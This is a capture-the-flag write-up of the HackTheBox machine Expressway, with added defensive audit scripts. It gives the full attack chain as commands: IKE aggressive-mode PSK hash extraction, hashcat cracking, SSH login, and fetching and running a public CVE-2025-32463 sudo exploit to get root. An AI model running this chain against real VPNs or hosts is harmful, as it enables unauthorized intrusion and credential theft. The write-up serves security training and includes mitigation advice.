HackTheBox’s Expressway is a beginner-friendly Linux machine that teaches valuable lessons about VPN security, IKE (Internet Key Exchange) protocol enumeration, hash cracking, and modern sudo privilege escalation vulnerabilities. This writeup covers the complete exploitation chain from initial reconnaissance to root access.
Machine Information
- Platform: Linux (Debian)
- Difficulty: Easy
- Categories: VPN Enumeration, Hash Cracking, CVE Exploitation
Learning Objectives
This challenge focuses on:
- UDP port scanning and IKE protocol analysis
- Aggressive mode IKE handshake exploitation
- PSK (Pre-Shared Key) hash extraction and cracking
- Identifying custom sudo installations
- Exploiting CVE-2025-32463 for privilege escalation
Initial Reconnaissance
TCP Port Scanning
Starting with a standard TCP scan using nmap:
nmap -sV -O MACHINE_IP -T5
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Only SSH (port 22) is open on TCP. The banner reports OpenSSH 10.0p2 Debian 8, where the trailing 8 is the Debian package revision rather than a Debian release (the login banner later in this writeup shows a Debian 14 kernel).
Important Discovery
Finding only SSH open on TCP is a strong indicator to check UDP ports, especially in VPN-related challenges.
UDP Port Scanning
Always remember to scan UDP ports - many services run on UDP:
nmap -sU -sV MACHINE_IP -T5
Results:
PORT STATE SERVICE
500/udp open isakmp
Bingo! We found UDP port 500 running ISAKMP (Internet Security Association and Key Management Protocol), which is used by IKE for VPN negotiation.
IKE Protocol Enumeration
Understanding IKE
IKE (Internet Key Exchange) is the protocol used to set up security associations in IPsec VPN connections. It operates on UDP port 500 and uses two main modes:
- Main Mode: More secure, exchanges information in encrypted form
- Aggressive Mode: Faster but less secure, exchanges identity information in cleartext
Simple IKE Scan
Using ike-scan to probe the service:
sudo ike-scan MACHINE_IP
Output:
MACHINE_IP Main Mode Handshake returned
HDR=(CKY-R=2ad62b0f5e7489c1)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK
LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Key Findings:
- Encryption: 3DES (weak by modern standards)
- Hash: SHA1 (also considered weak)
- Authentication: PSK (Pre-Shared Key)
- Features: XAUTH and Dead Peer Detection enabled
Security Note
3DES and SHA1 are deprecated cryptographic algorithms vulnerable to various attacks. Their presence indicates potential security weaknesses.
Aggressive Mode Scan
Aggressive mode can leak identity information:
sudo ike-scan --aggressive MACHINE_IP
Output:
MACHINE_IP Aggressive Mode Handshake returned
HDR=(CKY-R=6f25465c8c7d0f1f)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK
LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Interesting Discovery: ike@expressway.htb
This reveals the VPN user identity, which we’ll use for SSH access later.
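As an added audit helper (not part of the original writeup or of ike-scan), the following parses the two ike-scan replies shown above and flags what a reviewer would flag: deprecated algorithms in the SA proposal, PSK authentication, and whether aggressive mode was accepted and returned an identity in cleartext. The sample text is constructed from the outputs quoted in this section, and the sets of weak algorithms are my choice for this example.

```python
import re

# Constructed samples: the two ike-scan replies quoted in this section,
# with the target address left as a placeholder.
MAIN_MODE_OUTPUT = """\
MACHINE_IP Main Mode Handshake returned
HDR=(CKY-R=2ad62b0f5e7489c1)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK
LifeType=Seconds LifeDuration=28800)
"""
AGGRESSIVE_OUTPUT = """\
MACHINE_IP Aggressive Mode Handshake returned
HDR=(CKY-R=6f25465c8c7d0f1f)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK
LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
Hash(20 bytes)
"""

# SA attributes an auditor should flag (the choice of sets is mine for this example).
WEAK = {"Enc": {"DES", "3DES"}, "Hash": {"MD5", "SHA1"},
        "Group": {"1:modp768", "2:modp1024"}}

def parse_sa(text):
    """Return the SA=(...) attributes as a dict, e.g. {'Enc': '3DES', ...}.
    The proposal can wrap onto a second line, so match across newlines."""
    m = re.search(r"SA=\((.*?)\)", text, re.S)
    return dict(re.findall(r"(\w+)=(\S+)", m.group(1))) if m else {}

def audit_ike(text):
    """Return a list of findings for one ike-scan reply."""
    findings = []
    sa = parse_sa(text)
    for attr, bad in WEAK.items():
        if sa.get(attr) in bad:
            findings.append(f"weak {attr}: {sa[attr]}")
    if sa.get("Auth") == "PSK":
        findings.append("PSK authentication (offline-crackable if aggressive mode is accepted)")
    if "Aggressive Mode Handshake returned" in text:
        findings.append("aggressive mode accepted")
        ident = re.search(r"ID\(Type=(\w+), Value=([^)]+)\)", text)
        if ident:
            findings.append(f"identity sent in cleartext: {ident.group(2)} ({ident.group(1)})")
    return findings

if __name__ == "__main__":
    for name, reply in (("main", MAIN_MODE_OUTPUT), ("aggressive", AGGRESSIVE_OUTPUT)):
        print(name, audit_ike(reply))
```

On a real engagement, feed it the saved stdout of ike-scan for each mode; the main-mode reply should yield only the algorithm and PSK findings, the aggressive-mode reply the two extra ones.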
Hash Extraction for Offline Cracking
Now let’s extract the PSK hash for offline cracking:
ike-scan -M -A MACHINE_IP --pskcrack=output.txt
Parameters explained:
- -M: Multiline output, which makes the IKE protocol details easier to read
- -A: Uses IKE Aggressive Mode instead of Main Mode
- --pskcrack: Saves the PSK parameters to output.txt in a format suitable for offline cracking
Output:
MACHINE_IP Aggressive Mode Handshake returned
HDR=(CKY-R=2db8f6ce7d1ae9ee)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK
LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
The PSK hash has been successfully saved to output.txt and is now ready for cracking.
Hash Cracking with Hashcat
Identifying the Hash Type
The hash extracted from IKE aggressive mode is hashcat mode 5400 (IKE-PSK SHA1); the MD5 variant is mode 5300.
Cracking Process
hashcat -m 5400 -a 0 output.txt /usr/share/wordlists/rockyou.txt
Parameters explained:
- -m 5400: Hash mode for IKE-PSK SHA1
- -a 0: Straight dictionary attack
- output.txt: Our extracted hash file
- rockyou.txt: Popular password wordlist
Hashcat Output:
Hash.Mode........: 5400 (IKE-PSK SHA1)
Status...........: Cracked
Time.Started.....: Thu Oct 9 19:18:10 2025 (3 secs)
Speed.#1.........: 2068.3 kH/s
Progress.........: 8045568/14344385 (56.09%)
Recovered........: 1/1 (100.00%) Digests
Password: *************************
Success! We found the PSK password (No speedrunners allowed ;D).
Credentials Found
Username: ike (from IKE scan)
Password: ************************* (from hashcat)
Target: MACHINE_IP (SSH service)
Initial Access via SSH
Connecting to SSH
With our discovered credentials, let’s connect:
ssh ike@MACHINE_IP
Login successful:
ike@MACHINE_IP's password: *************************
Last login: Thu Oct 9 18:40:37 BST 2025 from 10.10.14.126 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC
Debian 6.16.7-1 (2025-09-11) x86_64
ike@expressway:~$
We’re in! Now let’s escalate privileges to root.
Privilege Escalation
Initial Enumeration
First, check if we can run sudo:
ike@expressway:~$ sudo -l
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, user ike may not run sudo on expressway.
The sudo error message looks non-standard. This is suspicious.
Identifying Custom Sudo Installation
Let’s check the sudo binary location:
ike@expressway:~$ which sudo
/usr/local/bin/sudo
Red flag! The standard sudo location is /usr/bin/sudo, not /usr/local/bin/sudo. This indicates a custom or manually installed version.
Checking Sudo Version
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Running sudo version 1.9.17 from /usr/local/bin/ is highly suspicious and worth investigating for known vulnerabilities.
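As an added example (not from this writeup or from the exploit repository linked below), a small check that turns the two observations above into findings: a sudo binary outside the package-managed path, and a version inside the CVE-2025-32463 range. The affected range, 1.9.14 through 1.9.17 with the fix in 1.9.17p1, is taken from the upstream advisory; the sample path and version banner are constructed from the output quoted above.

```python
import re

# Constructed sample: the `which sudo` and `sudo --version` output quoted above.
SUDO_PATH = "/usr/local/bin/sudo"
SUDO_VERSION_OUTPUT = """\
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
"""

# Where a Debian package would normally place the binary.
PACKAGED_PATHS = {"/usr/bin/sudo", "/bin/sudo"}

def parse_sudo_version(output):
    """Return (major, minor, patch, p_level) from a `sudo --version` banner.
    A release without a 'pN' suffix gets p_level 0, so 1.9.17 sorts before 1.9.17p1."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", output)
    if not m:
        raise ValueError("unrecognised sudo version banner")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))

def vulnerable_to_chwoot(version):
    """CVE-2025-32463 affects sudo 1.9.14 through 1.9.17 and was fixed in 1.9.17p1
    (range taken from the upstream advisory, not from this writeup)."""
    return (1, 9, 14, 0) <= version <= (1, 9, 17, 0)

def assess_sudo(path, version_output):
    """Combine the two indicators from this section into a list of findings."""
    findings = []
    if path not in PACKAGED_PATHS:
        findings.append(f"sudo resolves to {path}, outside the package-managed location")
    if vulnerable_to_chwoot(parse_sudo_version(version_output)):
        findings.append("version is in the CVE-2025-32463 (chwoot) range")
    return findings

if __name__ == "__main__":
    # On a live host: shutil.which("sudo") and subprocess.run(["sudo", "--version"]).
    print(assess_sudo(SUDO_PATH, SUDO_VERSION_OUTPUT))
```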
Vulnerability Research: CVE-2025-32463
A quick search reveals CVE-2025-32463 - a privilege escalation vulnerability affecting sudo versions up to 1.9.17.
Vulnerability Details:
- CVE ID: CVE-2025-32463
- Type: Local Privilege Escalation
- Affected Versions: sudo ≤ 1.9.17
- Attack Vector: Exploitation of sudo’s chroot handling
- Nickname: “chwoot” (chroot + woot)
CVE-2025-32463 Overview
This vulnerability allows local users to escalate privileges to root through improper handling of the user-supplied chroot directory (the -R/--chroot option) in vulnerable sudo versions: sudo resolves files inside that user-controlled directory while still running as root, so the user can influence what it loads.
Exploiting CVE-2025-32463
Step 1: Download the exploit from GitHub:
# On your attacking machine
wget https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/raw/main/sudo-chwoot.sh
# Transfer to target
scp sudo-chwoot.sh ike@MACHINE_IP:/tmp/exp.sh
Step 2: Make it executable and run:
ike@expressway:~$ chmod +x exp.sh
ike@expressway:~$ ./exp.sh
Exploitation Result:
ike@expressway:~$ ./exp.sh
woot!
root@expressway:/# whoami
root
Success! We have root access!
Capturing the Flags
# User flag
root@expressway:/# cat /home/ike/user.txt
[USER_FLAG_HERE]
# Root flag
root@expressway:/# cat /root/root.txt
[ROOT_FLAG_HERE]
Technical Summary
Attack Chain Overview
- Initial Recon: UDP scan revealed IKE service on port 500
- IKE Enumeration: Aggressive mode scan leaked user identity (ike@expressway.htb)
- Hash Extraction: Extracted PSK hash using ike-scan --pskcrack
- Password Cracking: Cracked hash with hashcat (mode 5400) → *************************
- Initial Access: SSH login with discovered credentials
- Privilege Escalation: Exploited CVE-2025-32463 in custom sudo 1.9.17 installation
MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application (IKE service enumeration)
- T1110 - Brute Force (Offline hash cracking)
- T1078 - Valid Accounts (SSH access with cracked credentials)
- T1548 - Abuse Elevation Control Mechanism (Sudo vulnerability exploitation)
Key Takeaways
Security Lessons
- Always scan UDP ports - Critical services like VPN often run on UDP
- IKE Aggressive Mode is dangerous - It leaks identity information and PSK hashes
- Weak cryptography is exploitable - 3DES and SHA1 are deprecated for good reason
- Custom installations are risky - Non-standard binary locations indicate potential vulnerabilities
- Keep software updated - CVE-2025-32463 was patched in later sudo versions
Tools Used
| Tool | Purpose | Command |
|---|---|---|
| nmap | Port scanning | nmap -sU -sV |
| ike-scan | IKE enumeration | ike-scan -M -A --pskcrack |
| hashcat | Password cracking | hashcat -m 5400 |
| ssh | Remote access | ssh user@host |
Defensive Recommendations
Mitigation Strategies
For VPN Administrators:
- Disable IKE Aggressive Mode entirely
- Use IKEv2 with modern cryptography (AES-256, SHA-256+)
- Implement strong PSK policies (long, random keys)
- Use certificate-based authentication instead of PSK
For System Administrators:
- Keep sudo updated to latest stable version
- Avoid custom binary installations outside package managers
- Monitor /usr/local/bin/ for unauthorized binaries
- Implement file integrity monitoring (AIDE, Tripwire)
Conclusion
Expressway demonstrates a realistic attack scenario combining VPN misconfiguration with software vulnerability exploitation. The challenge teaches important lessons about:
- The importance of comprehensive port scanning (TCP and UDP)
- Dangers of deprecated cryptographic protocols
- Offline password cracking techniques
- Identifying and exploiting custom software installations
- Researching and applying public CVE exploits
This machine serves as an excellent introduction to VPN security testing and privilege escalation via known vulnerabilities - skills essential for penetration testers and security professionals.
Additional Resources
- IKE-Scan Documentation
- Hashcat Wiki - IKE-PSK Mode
- CVE-2025-32463 Details
- IPsec/IKE Security Best Practices
Happy hacking and remember: always get proper authorization before testing! 🏴☠️